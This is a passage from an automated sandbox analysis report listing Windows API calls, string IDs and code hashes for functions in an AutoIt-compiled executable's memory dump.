                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00DD7753
                                                                                                                  • GetMonitorInfoW.USER32 ref: 00DD776D
                                                                                                                  • CopyRect.USER32(?,?), ref: 00DD7784
                                                                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00DD77EF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                  • Opcode ID: bd111b23de3e3af569f12a43678e32e3f31f966f7c0b6a9e8593c98c7c3a7ef2
                                                                                                                  • Instruction ID: baf75425b6143e141f0dbde8b6a1ab588cfb97377eb440041d24b39cf7208758
                                                                                                                  • Opcode Fuzzy Hash: bd111b23de3e3af569f12a43678e32e3f31f966f7c0b6a9e8593c98c7c3a7ef2
                                                                                                                  • Instruction Fuzzy Hash: E2B18071608340AFDB14DF64C948B6ABBE5FF88310F04895EF5999B391E770E805CB62
                                                                                                                  APIs
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D8A839
                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00D8A841
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D8A86C
                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00D8A874
                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00D8A899
                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D8A8B6
                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00D8A8C6
                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D8A8F9
                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D8A90D
                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00D8A92B
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00D8A947
                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D8A952
                                                                                                                    • Part of subcall function 00D8B736: GetCursorPos.USER32(000000FF), ref: 00D8B749
                                                                                                                    • Part of subcall function 00D8B736: ScreenToClient.USER32(00000000,000000FF), ref: 00D8B766
                                                                                                                    • Part of subcall function 00D8B736: GetAsyncKeyState.USER32(00000001), ref: 00D8B78B
                                                                                                                    • Part of subcall function 00D8B736: GetAsyncKeyState.USER32(00000002), ref: 00D8B799
                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00D8ACEE), ref: 00D8A979
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                  • Opcode ID: 81a766a990802a4b1b7494e17597f63de53d80292a650657896ae093a4a9293a
                                                                                                                  • Instruction ID: 5d4278cdc3e89c56bc4b86f3c4add9df50f7bfcece2a7a3ef2316af5a2290b2b
                                                                                                                  • Opcode Fuzzy Hash: 81a766a990802a4b1b7494e17597f63de53d80292a650657896ae093a4a9293a
                                                                                                                  • Instruction Fuzzy Hash: 92B17F7160020AEFDB14EFA9DC89BAD7BB5FB48314F11422AFA15E7290D770D841CB65
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00DD6A52
                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DD6B12
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                  • API String ID: 3974292440-719923060
                                                                                                                  • Opcode ID: 786b72a95816dfa177cedfaee0f2f4a683ebe37264518c019774173b0194226d
                                                                                                                  • Instruction ID: e3fafed24d2d0c21f597f9403515dad0598d544d85faac61576700e11df36ef9
                                                                                                                  • Opcode Fuzzy Hash: 786b72a95816dfa177cedfaee0f2f4a683ebe37264518c019774173b0194226d
                                                                                                                  • Instruction Fuzzy Hash: E3A173702543019FCB14EF14C951A6A77A6FF85364F18886EB896AB3D2DB30EC05CBB1
                                                                                                                  APIs
                                                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00DAE6E1
                                                                                                                  • _wcscmp.LIBCMT ref: 00DAE6F2
                                                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00DAE71A
                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00DAE737
                                                                                                                  • _wcscmp.LIBCMT ref: 00DAE755
                                                                                                                  • _wcsstr.LIBCMT ref: 00DAE766
                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00DAE79E
                                                                                                                  • _wcscmp.LIBCMT ref: 00DAE7AE
                                                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00DAE7D5
                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00DAE81E
                                                                                                                  • _wcscmp.LIBCMT ref: 00DAE82E
                                                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00DAE856
                                                                                                                  • GetWindowRect.USER32(00000004,?), ref: 00DAE8BF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                  • String ID: @$ThumbnailClass
                                                                                                                  • API String ID: 1788623398-1539354611
                                                                                                                  • Opcode ID: 68edbb949f54c85bc940da013c4450e2d737f3eace2f6ac06691512cbf69c27d
                                                                                                                  • Instruction ID: 1a76094d641794cc6b846247a52afff06531d3dce769c10926d16c93b2bbb991
                                                                                                                  • Opcode Fuzzy Hash: 68edbb949f54c85bc940da013c4450e2d737f3eace2f6ac06691512cbf69c27d
                                                                                                                  • Instruction Fuzzy Hash: D081A0310043099BDB05DF24C881FAA7BE9FF85314F18856AFD899A096EB34DD45CBB1
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                  • Opcode ID: 1702355ed6f70e9baf2b80e5a21d369c45e2220ef060408152ea18a8a9664d08
                                                                                                                  • Instruction ID: 203680cf89fe117028a865ce6418f4b81704d2f9d167f958ef9f118b5894fdc3
                                                                                                                  • Opcode Fuzzy Hash: 1702355ed6f70e9baf2b80e5a21d369c45e2220ef060408152ea18a8a9664d08
                                                                                                                  • Instruction Fuzzy Hash: 55319031A4831AB6DB14FB60ED13EAEB3A59F22714F204928F645710D5FFA1AF04C671
                                                                                                                  APIs
                                                                                                                  • LoadIconW.USER32(00000063), ref: 00DAF8AB
                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DAF8BD
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00DAF8D4
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00DAF8E9
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00DAF8EF
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00DAF8FF
                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00DAF905
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DAF926
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DAF940
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DAF949
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00DAF9B4
                                                                                                                  • GetDesktopWindow.USER32 ref: 00DAF9BA
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00DAF9C1
                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00DAFA0D
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00DAFA1A
                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00DAFA3F
                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DAFA6A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3869813825-0
                                                                                                                  • Opcode ID: 778bc570ddb06779a957c74fe137caa02c6c907efc9a9c455faf9b3d1c9ea64c
                                                                                                                  • Instruction ID: 17d9a510c0a664bb9148c453bb0e40426ab5d59501ef07dc314acef36f663995
                                                                                                                  • Opcode Fuzzy Hash: 778bc570ddb06779a957c74fe137caa02c6c907efc9a9c455faf9b3d1c9ea64c
                                                                                                                  • Instruction Fuzzy Hash: AC513A71900709AFDB209FA8CD89B6FBBB6FF05705F044968E596E26A0C774A944CF60
                                                                                                                  APIs
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC026A
                                                                                                                  • _wcschr.LIBCMT ref: 00DC0278
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC028F
                                                                                                                  • _wcscat.LIBCMT ref: 00DC029E
                                                                                                                  • _wcscat.LIBCMT ref: 00DC02BC
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC02DD
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DC03BA
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC03DF
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC03F1
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC0406
                                                                                                                  • _wcscat.LIBCMT ref: 00DC041B
                                                                                                                  • _wcscat.LIBCMT ref: 00DC042D
                                                                                                                  • _wcscat.LIBCMT ref: 00DC0442
                                                                                                                    • Part of subcall function 00DBC890: _wcscmp.LIBCMT ref: 00DBC92A
                                                                                                                    • Part of subcall function 00DBC890: __wsplitpath.LIBCMT ref: 00DBC96F
                                                                                                                    • Part of subcall function 00DBC890: _wcscpy.LIBCMT ref: 00DBC982
                                                                                                                    • Part of subcall function 00DBC890: _wcscat.LIBCMT ref: 00DBC995
                                                                                                                    • Part of subcall function 00DBC890: __wsplitpath.LIBCMT ref: 00DBC9BA
                                                                                                                    • Part of subcall function 00DBC890: _wcscat.LIBCMT ref: 00DBC9D0
                                                                                                                    • Part of subcall function 00DBC890: _wcscat.LIBCMT ref: 00DBC9E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                  • API String ID: 2955681530-2806939583
                                                                                                                  • Opcode ID: 2dc9228119f5f761b5dacbe42e6d179be758a8f4fa8799268eb1240e788e04a9
                                                                                                                  • Instruction ID: 563296a9f19a1f66c491ad8df03010f5e1647b6d2ecd8922c70f58cb74334d21
                                                                                                                  • Opcode Fuzzy Hash: 2dc9228119f5f761b5dacbe42e6d179be758a8f4fa8799268eb1240e788e04a9
                                                                                                                  • Instruction Fuzzy Hash: 0D91B171504302AFCB20EB60C855F9BB7E8EF88310F04895DF5599B291EB34EA44CB72
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DDCD0B
                                                                                                                  • DestroyWindow.USER32(00000000,?), ref: 00DDCD83
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DDCE04
                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DDCE26
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DDCE35
                                                                                                                  • DestroyWindow.USER32(?), ref: 00DDCE52
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D70000,00000000), ref: 00DDCE85
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DDCEA4
                                                                                                                  • GetDesktopWindow.USER32 ref: 00DDCEB9
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00DDCEC0
                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DDCED2
                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DDCEEA
                                                                                                                    • Part of subcall function 00D8B155: GetWindowLongW.USER32(?,000000EB), ref: 00D8B166
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                  • API String ID: 1297703922-3619404913
                                                                                                                  • Opcode ID: 7f52a55d979ebfec1d1fdea763b4e77850a32eddd638c36a42924412314d96f1
                                                                                                                  • Instruction ID: 1a36ce186b6c036da769a585f5e911efe0a0dfff84b74b0cd983fc785289200a
                                                                                                                  • Opcode Fuzzy Hash: 7f52a55d979ebfec1d1fdea763b4e77850a32eddd638c36a42924412314d96f1
                                                                                                                  • Instruction Fuzzy Hash: 5A718AB115430AAFD725CF28CC45FAA7BE6EB88704F48451DF985973A1D770E805CB25
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00DBB46D
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00DBB476
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DBB482
                                                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DBB561
                                                                                                                  • __swprintf.LIBCMT ref: 00DBB591
                                                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00DBB5BD
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DBB63F
                                                                                                                  • SysFreeString.OLEAUT32(00000016), ref: 00DBB6D1
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DBB727
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DBB736
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00DBB772
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                  • API String ID: 3730832054-3931177956
                                                                                                                  • Opcode ID: 4e21d147a6c4a59a1d637ba35142723abfbd1cf84dd37510a6f6af8320a65308
                                                                                                                  • Instruction ID: 4de8a8e2f94cd523de7d0686548c5d4ec53a71b199d75b7a25634f1f982ba336
                                                                                                                  • Opcode Fuzzy Hash: 4e21d147a6c4a59a1d637ba35142723abfbd1cf84dd37510a6f6af8320a65308
                                                                                                                  • Instruction Fuzzy Hash: F9C1E071A00615EFCB109F65D884BB9B7B5FF45320F188466E486EB682DBB4EC40DBB1
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00DD6FF9
                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DD7044
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                  • Opcode ID: bc8716185e3a5399c8ae55811577faa5f502d3164e34314e796dca6a3ad0a943
                                                                                                                  • Instruction ID: dcd8d16ed3b3572b40746ac235612a0675d5df0dbcce091f8c03c8104a527d4a
                                                                                                                  • Opcode Fuzzy Hash: bc8716185e3a5399c8ae55811577faa5f502d3164e34314e796dca6a3ad0a943
                                                                                                                  • Instruction Fuzzy Hash: 929194742087019FCB14EF14C851A6DB7A2EF94354F04889DF8966B792EB31ED06CB72
                                                                                                                  APIs
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DDE3BB
                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DDBCBF), ref: 00DDE417
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DDE457
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DDE49C
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DDE4D3
                                                                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00DDBCBF), ref: 00DDE4DF
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DDE4EF
                                                                                                                  • DestroyCursor.USER32(?), ref: 00DDE4FE
                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DDE51B
                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DDE527
                                                                                                                    • Part of subcall function 00D91BC7: __wcsicmp_l.LIBCMT ref: 00D91C50
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
